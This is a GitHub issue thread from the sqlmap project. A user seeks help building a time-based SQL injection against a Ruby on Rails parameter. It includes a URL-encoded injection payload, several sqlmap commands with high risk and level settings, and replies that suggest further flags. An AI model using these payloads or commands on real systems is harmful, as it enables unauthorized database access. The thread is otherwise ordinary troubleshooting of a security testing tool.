Join GitHub today
GitHub is home to over 50 million developers working together to host and review code, manage projects, and build software together.
Sign upGitHub is where the world builds software
Millions of developers and companies build, ship, and maintain their software on GitHub — the largest and most advanced development platform in the world.
Not a bug. Need help to find the right syntax #2413
Comments
|
Don't you think it's a false positive ? |
|
try this
|
|
use --technique=T to force timebased injection. |
|
@brandonalmost sorry for ignoring this. Is there are CVE related to this SQLi? I mean, from your payload it doesn't look like a proper SQL injection (no delimiter after |
|
@brandonalmost rerun your command to confirm it's a valid SQLI, also kindly proceed with --drop-set-cookie since it's a Boolean. |
Hello,
First sorry to open a issue about this again i know it's not a issue with sqlmap but i am lost with ruby on rails sql injection. I really need help to find the right syntax.
Ruby on Rails SQL injection
https://localhost/index.htm?cat=1&ob[mysql%20where%20sleep(1/10)%20%3b%20--%20.user][1]=1&off=1So i tried your syntax from this issue
sqlmap.py -u "https://localhost/index.htm?cat=1&ob[mysql%20where%20sleep(1/10)%20%3b%20--%20.user][1]=1&off=1" --eval='import time;uri=uri.replace("user]", "user%d]" % time.time())' --level=3 --risk=3 --time-sec=1I got a error:
[CRITICAL] an error occurred while evaluating provided code ('invalid syntax')I also tried to inject the parameter directly with this command:
sqlmap.py -u "https://localhost/index.htm?cat=1&ob=1*&off=1" --risk=3 --level=3 --time-sec=1False, normal blind unstead of time based:
Appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable[WARNING] false positive or unexploitable injection point detected